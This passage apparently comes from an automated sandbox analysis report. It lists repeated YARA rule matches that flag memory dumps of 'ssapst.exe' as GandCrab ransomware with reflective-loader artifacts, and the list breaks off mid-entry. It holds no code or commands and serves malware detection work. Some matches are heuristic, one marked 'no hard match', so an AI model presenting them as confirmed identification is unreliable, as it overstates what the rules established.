Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 8.3.ssapst.exe.30f0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 2.3.ssapst.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 26.3.ssapst.exe.3830000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
